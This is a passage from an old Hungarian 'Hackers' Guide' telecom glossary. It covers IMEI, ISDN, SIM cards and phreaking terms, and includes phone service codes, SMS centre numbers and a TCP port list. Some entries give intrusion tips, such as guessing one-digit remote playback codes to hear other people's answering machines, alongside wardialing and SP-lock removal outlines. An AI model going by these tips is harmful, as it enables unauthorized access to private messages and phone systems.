Equipment Identity number = nemzetközi mobilkészülék-azonosító szám. A készülék hátulján és a jótállási jegyen található, 15 számjegybol álló számsor.Az IMEI szám az alábbiakat jelenti: 123456-12-123456-1 aaaaaa-bb-cccccc-d 74 Hackers’ Guide a: TAC Type approval code tipus engedélyezési szám b: FAC Final assembly code végso összeszerelésikódszám c: SNR Serial numbr készülék sorozatszáma d: SP Spare tartalék szám Egykét tipp: Nokia:1610 / 1611 / 2110 / 3110 készülék IMEI száma: *#06# 3210 / 5110 / 6110 / 6150 / 7110 / 8210 / 8810 stb. készülék IMEI száma: *#06# szoftver verzió száma: *#0000# szerviz menü: *#92702689# EFR aktiválás / deaktiválás *3370# / #3370# Ga 628 / GH 688 készülék IMEI száma: *#06# szoftver verzió, gyártási id?: >*<<< IMX: Integrated Multimedia eXchange, azaz integrált multimédia-hálózat. Az AT&T az IMX endszerrel egy intézmény összes kommunikációs csatornáját egy

rendszeren belül biztosítja, azaz számítógép-hálózat, telefonközpont-rendszer, külso és belso kábelezési rendszer és végberendezések (PC, telefon, fax, videó) egy rendszerben. INFOSTRUKTÚRA: Olyan kommunikációs és informatikai rendszer, amely alkalmas multimédia-információk (hang, kép, adat) továbbítására. Aktív és passzív hálózati elemek építik fel a központi címadatbázist is tartalmazó rendszert, amelyet központi menedzsment felügyel. ISDN (Integrated Services Digital Network = integrált szolgáltatású digitális hálózat): Várhatóan világméreture bovülo, nyilvános távközlési hálózat-szabvány. Lényege, hogy használatával lehetoség van egyetlen telefonvonalon keresztül egyidoben digitális hang-, kép- és adatjelek átvitelére. Az ISDN teljesen digitális, nyilvános eléréssel az áramkörileg kapcsolt és a csomagkapcsolt hálózatok felé. Egyúttal digitális csatlakozási felületet is nyújt hang- és adatátvitel

terén a felhasználó és a nyilvános telefon, valamint a csomagkapcsolt hálózatok között.Az isdn rendszerben, az analog távbeszélo rendszerrel ellentétben az összekotetés külön vezérlo csatornát használnak. ISDN ALAPÚ BEVÁLASZTÁS: Alközponti mellékállomások a közcélú hálózatból a kezelo beavatkozása nélkül, közvetlenül hívhatóak. A mellékek a közcélú ISDN számmezejébol kapnak hívószámot (Magyarországon pl. vidék 6, Budapest 7 jegy) A legkisebb alközpontok számára is elérheto, mert a legkisebb csatornaszám 2, ami kettes lépésenként növelheto; a lefoglalható legkisebb számmezo 10. Minden csatlakozás kétirányú, így mind kimeno, mind bejövo hívás esetén bármely szabad csatorna használható. ISDN BRI: ISDN alapcsatlakozás (Basic Rate Interface), azaz alapsebességu hozzáférés a meglévo elofizetoi érpárokon. Három logikai csatornát (2B+D), azaz 2 egymástól független 64 kbit/s átviteli sebességu csatornát és

egy 16 kbit/s-os csomagkapcsolt csatornát jelent. Ez utóbbi jelzésüzeneteket szállít a használó végberendezései és a központ között. Egy ISDN-alapcsatlakozás általában egy hívószámmal rendelkezik. ISDN PRI: ISDN primercsatlakozás (Primary Rate Interface), ami tartalmaz 30 db 64 kbit/s sebességu információ- és egy 64 kbit/s-os jelzésátviteli csatornát (30B+D), kiegészítve egy szabványos ISDN-elofizetoi jelzésrendszerrel. Egyszerre max 30 csatornához biztosít hozzáférést. Az ISDN PRI az elso olyan szabványos 2 Mbit/s-os digitális elofizetoi csatlakozási 75 Hackers’ Guide forma, amely európai szabványokon alapul és kapcsolt szolgáltatás igénybevételét teszi lehetové. KAPCSOLT VONAL AZONOSÍTÁSA (COLP = Connected Line Identification Presentation): Lehetové teszi, hogy a hívást kezdeményezo fél készüléke kijelezze a ténylegesen kapcsolt elofizeto hívószámát, ha ezt a hívott fél nem tiltotta meg. Ez egyrészt a

tárcsázott számok helyességének ellenorzését szolgálja, másrészt akkor van jelentosége, ha a hívott szám el van irányítva és a hívás nem az eredetileg tárcsázott számra kerül. KOMMUNIKÁCIOS PROTOKOLOK: Az adatátviteli szabályok ,megállapodok össszeségét kommunikációs protokolnak nevezzuk.Bövebben:RS-232-C LOCAL HOOP: Az elöfizetok telefonja és a végpont közötti kéthuzalos összekötettést elöfizetoi huroknak nevezik. (analog) ha a vilag összes elöfizetoi hurokját egymás utan kifeszitve kiteritenénk akkor az 1982. évi telefon adatok szerint a Föld Hold távolság 2000 szeresét kapnánk de az adatok 82esek ezért az eltelt 18 év alatt mar lehet hogy ugyan ez az a 2000 (év)szam a mars fold lenne.jo mi? LB-TELEFON: A készülékben lévo teleprol táplált (Local Battery) készülék. Általában ilyen készülékeket használnak pl. a hadseregben rövid távú tábori távbeszélo céljára A csengetofeszültséget is a készülékbe

épített kisméretu váltakozóáramú generátor (induktor) biztosítja. (=> CB-telefon) MAGÁNHALÓZAT: Távközlési berendezések és az oket összeköto átviteli berendezések olyan együttese, amely csak egy meghatározott társaság alkalmazottai és üzletfelei között hoz létre hang-, kép- vagy adatátvitelt. A nyilvános hálózatoktól függetlenül muködnek, de használhatják, bérelhetik azok szolgáltatásait. MASSAGE SWITCHING:Üzenet kapcsolás.Ebben a kapcsolási formaban nincs elore felépült út a küldö és a vevo között.Ehelyett,amikor az adónak van elkuldendo adatblokja,akkor azt az elso kapcsoló központ tárolja majd késobb tovabbítja egy másik kapcsolóközpontnak és igy tovább.Az ilyen technikat használóhálózatokat tarol-továbbít (store and forward) hálózatoknak nevezik. MIKOROCOM NETWORKING PROTOKOL: A modemek szabványos hibajavitó és tömöritoeljarásai az MNP protokolok. MODEM (MOdulator - DEModulator): Információátvitelt

tesz lehetové a jelcsatornán át. Pl digitális információk analóg vonalon való továbbításakor használják <------telefonvonal---------->|modem|<---->|soros interfesz|<---->|mikorszamítógép| Ne zavarj szolgáltatás: Az elofizeto, aki bizonyos ideig nem akarja fogadni az érkezo hívásokat, átirányíthatja azt egy rögzített bemondást adó berendezésre, amely értesíti errol a hívó felet. NMT: Nordic Mobile Telephone System, azaz Észak-európai mobiltelefon-rendszer. Ebbe a rendszerbe tartozik pl. a magyarországi Westel 450 is PÁRHUZAMOS ADATÁTVITEL: a periféria interfész és a periféria között az adatokat bitcsoportonként egyszerre visszuk át. PIN-KÓD: Personal Identification Number = személyi azonosító szám. Olyan 4-8 számjegyu kód, mely a SIM-kártya jogtalan használatát akadályozza meg. Bekapcsoláskor a készülék kéri a PIN-kódot. A PIN-kódját a tulajdonos a SIM-kártya megvételekor kapja meg egy lezárt

borítékban. PUK-KÓD: Personal Unblocking Key = személyes blokkolásfeloldó kulcs. Ha egymás után háromszor rossz PIN-kódot ad meg, akkor telefonkészüléke 76 Hackers’ Guide használhatatlanná válik, a SIM-kártya blokkolódik. Ekkor a PUK-kóddal lehet a blokkolást feloldani és a telefont újra muködoképessé tenni. PUK-kódját a SIM-kártya megvételekor kapta meg egy lezárt borítékban, a PIN-kóddal együtt. PHREAKER(kaloz): A telefonközpontok vezérloszámítógépeinek, a távközlési vonalak ingyenes igénybevételének és általában a telekommunikációnak a szakértoi. Rendelkeznek a központok átprogramozásához szükséges tudással, illetve megfelelo eszközökkel a mobil telefon hálózat forgalmának, belso adatainak lehallgatásához. Késobb ok maguk, vagy akiknek az információkat továbbadták mások költségére telefonálnak. A 95-ös adatok szerint, az összesített kár több mint 4 milliárd USD. R2/MFC alapú beválasztás:

Alközponti mellékállomások a közcélú hálózatból a kezelo beavatkozása nélkül, közvetlenül hívhatóak. Alkalmazása csak közepes és nagy központok esetén célszeru, mert a legkisebb bemeno kapacitás 30 csatorna és a legkisebb lefoglalható számmezo nem lehet kisebb 100-nál. Magyarországon a csatlakozás egyirányú; ha az alközpont - foközpont irányban forgalmi torlódás lép fel (minden fovonal foglalt), akkor az alközpontból kimeno hívás nem kezdeményezheto akkor sem, ha a trönkcsoport foglaltsága minimális. RENDSZERIGAZGATÁS: nélkülözhetetlen eleme egy modern hálózatnak. Az ide tartozó tevékenységek: - hibabejelentés, -behatárolás és -dokumentálás; programozás (hálózati jellemzok beállítása); - rendszerfelügyelet (környezeti, és más tényezok mérése); - forgalmi mérések és jelentéskészítés. ROAMING: A roaming = vándorlás lényege, hogy a GSM nemzetközi szabványának köszönhetoen az egyes országok egymás

közt kompatibilisen építik ki hálózatukat. Így lehetoség van arra, hogy egyik ország elofizetoje, ha külföldre utazik, bekapcsolódjon az illeto ország hálózatába és használja azt, vagyis az adott országban „vándoroljon”. Az elofizetok külföldi tartózkodásuk alatt is ugyanúgy használhatják mobiltelefonjukat, mint otthon; külföldön is a saját telefonszámukon lehet oket elérni. Ehhez azonban a két ország szolgáltatójának egy kétoldalú ún roaming-megállapodást kell kötnie. SOROS ADATÁTVITEL: A periféria interfész és a periféria között az adatokat bitenként sorban egymasutan visszük át. SIMPLEX ADATÁTVITEL: Az adatátvitel csak egyiranyba folyhat,azaz az adó és a vevo szerepe nem változhat. SZINES DOBOZOK: A blue box például a telefonközpontok közötti 2600 Hz-es un. in-band jelzéseket felhasználva ingyenes távhívásra "jogosít".De ez mar megszunt a digitalis vonalak terjedésével magyarokat amugy sem

érintet.hm vagy lehet mégis ? (NEM és NEM és NEM!!! Magyarországon NEM lehet dobozolni!!!!! - MMan) Red box a pénz leesésekor keletkezo jelet emulaja pl:5,10,25,50 centesekét. SIM-KÁRTYA: (Subscriber Identity Modul)A GSM rendszerhez való csatlakozáshoz Önnek szüksége van egy SIM-kártyára. A SIM-kártya biztosítja az elofizetok azonosítását a GSM rendszerén belül, illetve más rendszerekben, azaz tartalmazza az elofizeto telefonszámát (számait). A GSM központja az egyes elofizetok szolgáltatásait is SIM-kártyájuk alapján azonosítja, ezzel biztosítva, hogy mindenki az általa megrendelt szolgáltatást vehesse igénybe. Ezen kívül a SIM-kártya teszi lehetové, hogy a hívásokat mindig a megfelelo elofizetonek számlázzák ki, mivel a SIM-kártya azonosítja az elofizetot a számlázási rendszer számára is. A SIM-kártya minden GSM rendszeru telefonkészülékbe behelyezheto és muködtetheto, függetlenül annak típusától. A SIM kártyához

rendelt PIN, PUK, ADM kódokat a kártya egyedi azonosítója (ID) és egy, csak agyártó által ismert kulcs felhasználásával generálják a DES algoritmus 77 Hackers’ Guide segítségével. A SIM kártyán két fontos adat szerepel A 15 számjegy hosszú IMSI (International Mobile Subscriber Identity), a nemzetközi mobil elofizeto azonosító, és a elofizeto autentikációs kulcsa a Ki, ami egy 32 hexadecimális karakter hosszú kulcs, és a legbiztonságosabban védett kód a GSM rendszerben SMS:rövid szoveges uzenet hossza max160 karakter, a teljeség igénye nélkül néhány SMS központ szám: Ország neve: Hálózat neve: Andorra Australia STA Telstar Optus Vodafone A1 Mobilkom Proximus Austria Belgium Canada China Czech Republic Denmark Estonia Finland France Germany Mobistar Fido Telecom Eurotel Radiomobil TeleDanmark Sonofon EMT Ritabell Radiolinja Radiolinja Nokia Sonera Bouygues Itineris SFR D1 D2 E-Plus Talkline Greece 78 Debitel IC 3S Dr

Materna Panafon Telestat OTE Hellas Üzenetközpont száma: +376 30 1004 +61 418 706700 +61 412 025989 +61 21 600600 +43 664 0501 +43 676 021 +32 75 161616 +32 75 161612 +32 95 955205 +1 514 993 1123 +86 139 059 1500 +420 602 909909 +420 603 051 +45 405 90000 +45 403 90999 +45 436 25250 +372 50 99000 +372 55 09911 +372 56 8771010 +358 50 877 1010 +358 40 520 2999 +358 40 520 2000 +33 660 00 30 00 +33 007 00 10 80 +33 689 00 45 81 +33 609 00 13 90 +49 171 0760000 +49 172 227033 +49 172 2270000 +49 172 2270222 +49 172 2270333 +49 177 0600000 +49 177 0610000 +49 177 0620000 +49 172 2270258 +49 171 0760900 +49 172 2270222 +49 172 2270201 +49 172 2270111 +44 385 016005 +30 935 99000 +30 385 0116005 Hackers’ Guide Holland Hong Kong Hungary Libertel PTT HK Telecom Hutchinson Pannon GSM Westel Ireland Vodafone Postur og Simi GSM-XL Satelindo Telkomsel Eircell Italy Esat Omni Iceland Indonesia TIM Latvia Lebanon Lithuania Luxembourg Malaysia New Zealand Norway LMT Lebancell

Omnitel Bite GSM PTT Adam Celcom Maxis Mutiara Bell South Netcom TeleNor Poland Era GSM Polkomtel Portugal Russia Singapore Slovakia South Africa IDEA Centertel Telcel TMN Beeline 1800 MTS North West Mobile One SingTel Eurotel MTN +31 654 881000 +31 653 131313 +852 9028 8000 +852 9498 5795 +36 203 00099 +36 306 10000 +36 308 88000 +36 303 03100 +36 709 996500 +3854 890 0100 +62 818 445009 +62 816 15 +62 811 130004 +353 87 699985 +353 87 699989 +353 86 800 2000 +39 349 2000300 +39 349 2000200 +39 338 960960 +39 338 980000 +371 920 2020 +961 348 8888 +37 0989 9992 +37 0995 0115 +352 021 100003 +60 17 360 0010 +60 19 390 0000 +60 12 000 0015 +60 16 299 9000 +64 21 600600 +47 920 01000 +47 920 8977 +47 900 02100 +47 900 07777 +48 602 951111 +48 602 951112 +48 601 000311 +48 601 000310 +48 501 200777 +351 931 770077 +351 931 770077 +7 901 73100 +7 095 7699100 +7 812 9600096 +65 968 45999 +65 964 00001 +65 965 00001 +65 981 89999 +421 90 3333000 +27 83 1000002 79 Hackers’

Guide Vodacom Spain Airtel Sweden Telefonica Comviq Switzerland Thailand The Philipines Turkey United Kingdom USA Europolitan Telia Natel-D AIS Globe Turkcell Telsim One-2-One Cellnet Orange Vodafone Aerial Coms Microcell Telecom Omnipoint Powertel Pacific Bell Sprint Washington PCS +27 82 9119 +27 82 9129 +34 60713 3000 +34 60700 3110 +34 60909 0909 +46 707 990001 +46 707 990003 +46 707 773078 +46 708 000708 +46 705 008999 +41 794999000 +66 1811 0888 +63 91 702 +90 53290 10000 +90 542 9800033 +44 7958 879879 +44 802 000332 +44 973 100973 +44 385 016005 +1 813 263 0025 +1 281 235 0025 +1 514 993 1123 +1 917 907 0004 +1 334 333 8200 +1 209 904 2010 +1 704 410 0000 +1 410 258953 lehet lelkesen progálgatni a freesmst. SP: ( Service Provider ) lock A Service Provider lock a szolgáltatók által használt kódvédelem, melynek lényege, hogy az SP lock-os telefon csak az adottszolgáltató SIM kártyáját fogadja el. Idegen kártyával nem lehet használni Ezt a szolgáltatók

saját szerzôdéseik megvédésére használják, hiszen nekik a hosszú távú elôfizetés hozza a bevételt. A bevételek elôrekalkulációjával rájöttek, hogy nekik nem ráfizetés a telefonokat akcióban olcsóbban adni, hiszen minél olcsóbb a készülék, annál több ügyfelet vonzanak, így nagyobb lesz a bevételük, és a mérleg pozitív marad. De ennek feltétele, hogy maradjon az ügyfél az adott elôfizetésnél. Ezt a védelmet pedig az SP lock biztosítja. De nézzük a másik oldalról Azzal, hogy az SP lock-ot eltüntetjük, jóval megnöveljük a telefon értékét, hiszen az akcióban vett telefonhoz akár 1/5 áron is hozzá lehet jutni. Az SP lock kivétele után a telefon megközelíti az eredeti értékét. Lehetôség pedig van a lock feloldására A Nokia telefonokon van egy kifejezetten szervízfunkciókat ellátó félduplex busz, melyet a PC soros portjával lehet összekötni a megfelelô adatkábellel. Ezen keresztül lehet elvégezni az SP lock

feloldási muveletét. Az SP lock használata elterjedt egész Európában, szinte valamennyi szolgáltató használja már. Nálunk a Pannon GSM és a Westel900 is ezek közé tartozik. Ha akcióban vetted a telefonod, akkor biztos lehetsz benne, hogy SP lock van benne. Az értéke addig nem lesz több az akciós áránál, amíg ez a lock muködik benne. Egy példa: Nokia 5110/SL ( SL = SP lock-os telefon ) akciós ára elôfizetéssel 15 ezer forint volt (nettó). A Nokia 5110 lock 80 Hackers’ Guide nélküli telefon új ára 80 ezer forint (nettó). A feloldásra a Nokia telefonoknál létezik egy másik módszer is. Mégpedig egy olyan algoritmus kell hozzá, ami az IMEI számból számolja a lock feloldásához szükséges kódot. Ezt a kódot azután bekell ütni a telefonba egy ennek megfelelô elôkóddal együtt. Ez elvileg hatástalanítja az SP lock-ot. SZAKÉRTO ÜGYINTÉZÖK KIVÁLASZTÁSA: A bejövo hívások a híváselosztási csoporton belül kisebb,speciális

ügyintézoi csoportra kapcsolódhatnak. Segítségével tökéletesen összehozható a hívó igénye és az ennek megfelelo szaktudású és tapasztalatú ügyintézo (nyelvtudás, egy bizonyos termék ismerete, stb.) TÁRCSAHANG: A központ ezzel a figyelmezteto jelzéssel üzeni a felhasználónak, hogy készen áll a hívandó szám számjegyeinek fogadására. TÁVOLI ELÉRÉS STÁTUSZA: Megvalósítható „távolról hívás a cég számlájára”, azaz otthonról is lebonyolíthat telefonokat (pl. külföldre) a cég számlájára Az erre jogosult személyek különbözo kódokkal (szolgáltatás-kód, azonosító kód) aktiválhatják ezt a szolgáltatást. Nyomon követhetoek, azaz adminisztrálhatóak ezek a hívások is, így lehetové válik a visszaélések megszüntetése. TÖMÖRITÉSI ALGORITMUSOK: Ezen eljárások lényege, hogy a rendelkezésre álló (pl. ADCáltal szolgáltatott) bináris számokat valamilyen logikai rendszer szerint rendezi. Ezáltal egy, az

eredetinél kisebb méretu adathalmazt nyerünk, így azonos ido alatt ugyanazon átviteli csatornán jóval több információ viheto át. TRÖNK: Két központot összeköto speciális kábelköteg. Nincs közvetlen kapcsolatban az elofizetokkel, a központok közötti forgalmat bonyolítja. TOLL OFFICE: Minden végközpont több kimenö vonalal kapcsolodik a szomszédos kapcsolóközpontokhoz az un tavhívó központokhoz(toll office)Ezeket a vonalakat helyözi trönköknek (toll connecting trunk)nevezik. A távhivo kozpontok központkozi trönkökön keresztül kommunikálnak egymassal. UTÓELNYOMÁS (deemphasis): A vevooldalon az elokiemeléskor (=> elokiemelés) mesterségesen eltorzított frekvenciamenet visszállítása. ÜZEMFELUGYELET: Egy számítógép segítségével történik. A gép közvetlenül az alközponthoz csatlakozhat, vagy modem segítségével távfelügyelet is megvalósítható. Az üzemfelügyeleti programba való belépéshez a felhasználónak ismernie

kell a jelszót, így a rendszer a jogosulatlan próbálkozóktól védve van. A rendszertechnikus egy tárcsázható összeköttetésen keresztül beléphet a rendszerbe és egy távoli munkahelyrol is elvégezheti a felügyeleti és karbantartási muveleteket. A központ távolról is programozható és távoli mentések is elvégezhetoek. ÜZENETRÖGZÍTO: Hát ezt ne irom le hogy mit jelent csak egy tippet adók a támeghallgatásra a legtobb panaszonic üzenetrögzítot távolrol meg lehet hallgatni ha tudjuk a lejatszáshoz szukséges kodot es nyomunk egy csillag gombot de a legviccesebb a dologban hogy általában ez a kod 1 jegyu az az 10 lehetoség mert a nulla is benne van .A noname rögzítoknél hasonló a helyzet Ritka de létezik 3 kódú üzenet rögzíto,ezek változtathatok célszeru a születési éet megprobálni .(Nekünk is Panasonic van speciel.MMan:)))) VÁNDORLÁS: (=> roaming) VONALKAPCSOLT ÁTVITEL: Az eroforrás a kapcsolat egész idejére lefoglalódik, a

folyamatos információáramlás biztosított (pl. telefon) Elonye, hogy a végpontok közötti késleltetés minimális és ingadozásmentes. Hátránya, hogy a fix sávszélesség miatt rugalmatlan. (=> csomagkapcsolt átvitel) WARDIAL: A wardialer egy program ami a teáltalad megadott intervallumban(pl. 81 Hackers’ Guide 0680200 000-999) telefonszámokat hív fel. Te belehallgathatsz ezekbe a számokba, így találhatsz rengeteg információs vonalat.by mman 2000 by MMan. * Szabványos portok listája Itt van egy portlista, amely megmutatja, hogy szabványos esetben melyik porton milyen szolgáltatás üzemel. Ez a lista innen származik:http://forbiddennetsecurityorg//[SiRiUs]/ 0=Reserved 1=tcpmux 2=compressnet 3=compressnet 4=Unassigned 5=Remote Job Entr 6=Unassigned 7=Echo 8=Unassigned 9=Discard 10=Unassigned 11=Active Users 12=Unassigned 13=Daytime 14=Unassigned 15=Unassigned 16=Unassigned 17=Quote of the Day 18=Message Send Protocol 19=Character Generator 20=FTP

(Data) 21=FTP (Control) 22=Unassigned 23=Telnet 24=Private mail-system 25=SMTP 26=Unassigned 27=NSW User System FE 28=Unassigned 29=MSG ICP 82 Hackers’ Guide 30=Unassigned 31=MSG Authentication 32=Unassigned 33=Display Support Protocol 34=Unassigned 35=Private printer server 36=Unassigned 37=Time 38=Route Access Protocol 39=Resource Location Protocol 40=Unassigned 41=Graphics 42=Host Name Server 43=Who Is 44=MPM FLAGS Protocol 45=Message Processing Module (recv) 46=mpm-snd, MPM (default send) 47=ni-ftp 48=Digital Audit Daemon 49=login, Login Host Protocol 50=re-mail-ck, Remote Mail Checking Protocol 51=IMP Logical Address Maintenance 52=xns-time, XNS Time Protocol 53=domain, Domain Name Server 54=xns-ch, XNS Clearinghouse 55=ISI Graphics Language 56=XNS Authentication 57=Private terminal access 58=XNS Mail 59=Private file service 60=Unassigned 61=NI MAIL 62=ACA Services 63=Unassigned 64=Communications Integrator (CI) 65=TACACS-Database Service 66=Oracle SQL*NET 67=Bootstrap

Protocol Server 68=Bootstrap Protocol Client 69=Trivial File Transfer 70=Gophergopher 71=Remote Job Service 72=Remote Job Service 73=Remote Job Service 74=Remote Job Service 75=any private dial out service 76=Distributed External Object Store 77=any private RJE service 78=vettcpvettcp 79=Finger server 83 Hackers’ Guide 80=HTTP 81=HOSTS2 Name Server 82=XFER Utility 83=MIT ML Device 84=Common Trace Facility 85=MIT ML Device 86=Micro Focus Cobol 87=Private terminal link 88=Kerberos 89=SU/MIT Telnet Gateway 90=DNSIX Securit Attribute Token Map 91=MIT Dover Spooler 92=Network Printing Protocol 93=Device Control Protocol 94=Tivoli Object Dispatcher 95=SUPDUPsupdup 96=DIXIE Protocol Specification 97=Swift Remote Vitural File Protocol 98=TAC Newstacnews 99=Metagram Relay 100=newacct [unauthorized use] 101=NIC Host Name Server 102=ISO-TSAP 103=Genesis Point-to-Point Trans Net 104=ACR-NEMA Digital Imag. & Comm 300 105=Mailbox Name Nameserver 106=3COM-TSMUX3com-tsmux 107=Remote Telnet

Service 108=SNA Gateway Access Server 109=Post Office Protocol - Version 2 110=Post Office Protocol - Version 3 111=SUN RPC 112=McIDAS Data Transmission Protocol 113=Authentication Service 114=Audio News Multicast 115=Simple File Transfer Protocol 116=ANSA REX Notify 117=UUCP Path Service 118=SQL Servicessqlserv 119=Network News Transfer Protocol 120=CFDPTKTcfdptkt 121=Encore Expedited Remote Pro.Call 122=SMAKYNETsmakynet 123=Network Time Protocol 124=ANSA REX Trader 125=Locus PC-Interface Net Map Ser 126=Unisys Unitary Login 127=Locus PC-Interface Conn Server 128=GSS X License Verification 129=Password Generator Protocol 84 Hackers’ Guide 130=cisco FNATIVE 131=cisco TNATIVE 132=cisco SYSMAINT 133=Statistics Service 134=INGRES-NET Service 135=Location Service 136=PROFILE Naming System 137=NETBIOS Name Service 138=NETBIOS Datagram Service 139=NETBIOS Session Service 140=EMFIS Data Service 141=EMFIS Control Service 142=Britton-Lee IDM 143=Interim Mail Access Protocol v2

144=NewSnews 145=UAAC Protocoluaac 146=ISO-IP0iso-tp0 147=ISO-IPiso-ip 148=CRONUS-SUPPORT 149=AED 512 Emulation Service 150=SQL-NETsql-net 151=HEMShems 152=Background File Transfer Program 153=SGMPsgmp 154=NETSCnetsc-prod 155=NETSCnetsc-dev 156=SQL Service 157=KNET/VM Command/Message Protocol 158=PCMail Serverpcmail-srv 159=NSS-Routingnss-routing 160=SGMP-TRAPSsgmp-traps 161=SNMP 162=SNMP TRAP 163=CMIP/TCP Manager 164=CMIP/TCP Agent 165=Xeroxxns-courier 166=Sirius Systems 167=NAMPnamp 168=RSVDrsvd 169=Send 170=Network PostScript 170=Network PostScript 171=Network Innovations Multiplex 172=Network Innovations CL/1 173=Xyplexxyplex-mux 174=MAILQ 175=VMNET 176=GENRAD-MUXgenrad-mux 177=X Display Manager Control Protocol 178=NextStep Window Server 85 Hackers’ Guide 179=Border Gateway Protocol 180=Intergraphris 181=Unifyunify 182=Unisys Audit SITP 183=OCBinderocbinder 184=OCServerocserver 185=Remote-KIS 186=KIS Protocolkis 187=Application Communication Interface 188=Plus Fives MUMPS

189=Queued File Transport 189=Queued File Transport 190=Gateway Access Control Protocol 190=Gateway Access Control Protocol 191=Prospero Directory Service 191=Prospero Directory Service 192=OSU Network Monitoring System 193=srmp, Spider Remote Monitoring Protocol 194=irc, Internet Relay Chat Protocl 195=DNSIX Network Level Module Audit 196=DNSIX Session Mgt Module Audit Redir 197=Directory Location Service 198=Directory Location Service Monitor 199=SMUX 200=IBM System Resource Controller 201=at-rtmp AppleTalk Routing Maintenance 202=at-nbp AppleTalk Name Binding 203=at-3 AppleTalk Unused 204=AppleTalk Echo 205=AppleTalk Unused 206=AppleTalk Zone Information 207=AppleTalk Unused 208=AppleTalk Unused 209=Trivial Authenticated Mail Protocol 210=ANSI Z39.50z3950 211=Texas Instruments 914C/G Terminal 212=ATEXSSTRanet 213=IPX 214=VM PWSCSvmpwscs 215=Insignia Solutions 216=Access Technology License Server 217=dBASE Unix 218=Netix Message Posting Protocol 219=Unisys ARPsuarps 220=Interactive

Mail Access Protocol v3 221=Berkeley rlogind with SPX auth 222=Berkeley rshd with SPX auth 223=Certificate Distribution Center 224=Reserved (224-241) 241=Reserved (224-241) 86 Hackers’ Guide 242=Unassigned# 243=Survey Measurement 244=Unassigned# 245=LINKlink 246=Display Systems Protocol 247-255 Reserved 256-343 Unassigned 344=Prospero Data Access Protocol 345=Perf Analysis Workbench 346=Zebra serverzserv 347=Fatmen Serverfatserv 348=Cabletron Management Protocol 349-370 Unassigned 371=Clearcaseclearcase 372=Unix Listservulistserv 373=Legent Corporation 374=Legent Corporation 375=Hasslehassle 376=Amiga Envoy Network Inquiry Proto 377=NEC Corporation 378=NEC Corporation 379=TIA/EIA/IS-99 modem client 380=TIA/EIA/IS-99 modem server 381=hp performance data collector 382=hp performance data managed node 383=hp performance data alarm manager 384=A Remote Network Server System 385=IBM Application 386=ASA Message Router Object Def. 387=Appletalk Update-Based Routing Pro. 388=Unidata

LDM Version 4 389=Lightweight Directory Access Protocol 390=UISuis 391=SynOptics SNMP Relay Port 392=SynOptics Port Broker Port 393=Data Interpretation System 394=EMBL Nucleic Data Transfer 395=NETscout Control Protocol 396=Novell Netware over IP 397=Multi Protocol Trans. Net 398=Kryptolankryptolan 399=Unassigned# 400=Workstation Solutions 401=Uninterruptible Power Supply 402=Genie Protocol 403=decapdecap 404=ncednced 405=ncldncld 406=Interactive Mail Support Protocol 407=Timbuktutimbuktu 87 Hackers’ Guide 408=Prospero Resource Manager Sys. Man 409=Prospero Resource Manager Node Man. 410=DECLadebug Remote Debug Protocol 411=Remote MT Protocol 412=Trap Convention Port 413=SMSPsmsp 414=InfoSeekinfoseek 415=BNetbnet 416=Silverplattersilverplatter 417=Onmuxonmux 418=Hyper-Ghyper-g 419=Arielariel1 420=SMPTEsmpte 421=Arielariel2 422=Arielariel3 423=IBM Operations Planning and Control Start 424=IBM Operations Planning and Control Track 425=ICADicad-el 426=smartsdpsmartsdp 427=Server

Location 429=OCS AMU 430=UTMPSDutmpsd 431=UTMPCDutmpcd 432=IASDiasd 433=NNSPnnsp 434=MobileIP-Agent 435=MobilIP-MN 436=DNA-CMLdna-cml 437=comscmcomscm 439=dasp, Thomas Obermair 440=sgcpsgcp 441=decvms-sysmgtdecvms-sysmgt 442=cvc hostdcvc hostd 443=https 444=Simple Network Paging Protocol 445=Microsoft-DS 446=DDM-RDBddm-rdb 447=DDM-RFMddm-dfm 448=DDM-BYTEddm-byte 449=AS Server Mapper 450=TServertserver 512=exec, Remote process execution 513=login, remote login 514=cmd, exec with auto auth. 514=syslog 515=Printer spooler 516=Unassigned 517=talk 519=unixtime 520=extended file name server 88 Hackers’ Guide 521=Unassigned 522=Unassigned 523=Unassigned 524=Unassigned 526=newdate 530=rpc courier 531=chatconference 532=readnewsnetnews 533=for emergency broadcasts 539=Apertus Technologies Load Determination 540=uucp 541=uucp-rlogin 542=Unassigned 543=klogin 544=kshell 545=Unassigned 546=Unassigned 547=Unassigned 548=Unassigned 549=Unassigned 550=new-who 551=Unassigned 552=Unassigned

553=Unassigned 554=Unassigned 555=dsf 556=remotefs 557-559=rmonitor 560=rmonitord 561=dmonitor 562=chcmd 563=Unassigned 564=plan 9 file service 565=whoami 566-569 Unassigned 570=demonmeter 571=udemonmeter 572-599 Unassigned ipc server 600=Sun IPC server 607=nqs 606=Cray Unified Resource Manager 608=Sender-Initiated/Unsolicited File Transfer 609=npmp-trapnpmp-trap 610=npmp-localnpmp-local 611=npmp-guinpmp-gui 634=ginadginad 666=Doom Id Software 704=errlog copy/server daemon 709=EntrustManager 729=IBM NetView DM/6000 Server/Client 89 Hackers’ Guide 730=IBM NetView DM/6000 send/tcp 731=IBM NetView DM/6000 receive/tcp 741=netGWnetgw 742=Network based Rev. Cont Sys 744=Flexible License Manager 747=Fujitsu Device Control 748=Russell Info Sci Calendar Manager 749=kerberos administration 751=pump 752=qrh 754=send 758=nlogin 759=con 760=ns 762=quotad 763=cycleserv 765=webster 767=phonephonebook 769=vid 771=rtip 772=cycleserv2 774=acmaint dbd 775=acmaint transd 780=wpgs

786=Concertconcert 800=mdbs daemon 996=Central Point Software 997=maitrd 999=puprouter 1023=Reserved 1024=Reserved 1025=network blackjack 1030=BBN IAD 1031=BBN IAD 1032=BBN IAD 1067=Installation Bootstrap Proto. Serv 1068=Installation Bootstrap Proto. Cli 1080=SOCKS 1083=Anasoft License Manager 1084=Anasoft License Manager 1155=Network File Access 1222=SNI R&D network 1248=hermes 1346=Alta Analytics License Manager 1347=multi media conferencing 1347=multi media conferencing 1348=multi media conferencing 1349=Registration Network Protocol 1350=Registration Network Protocol 1351=Digital Tool Works (MIT) 90 Hackers’ Guide 1352=/Lotus Notelotusnote 1353=Relief Consulting 1354=RightBrain Software 1355=Intuitive Edge 1356=CuillaMartin Company 1357=Electronic PegBoard 1358=CONNLCLIconnlcli 1359=FTSRVftsrv 1360=MIMERmimer 1361=LinX 1362=TimeFliestimeflies 1363=Network DataMover Requester 1364=Network DataMover Server 1365=Network Software Associates 1366=Novell NetWare Comm Service

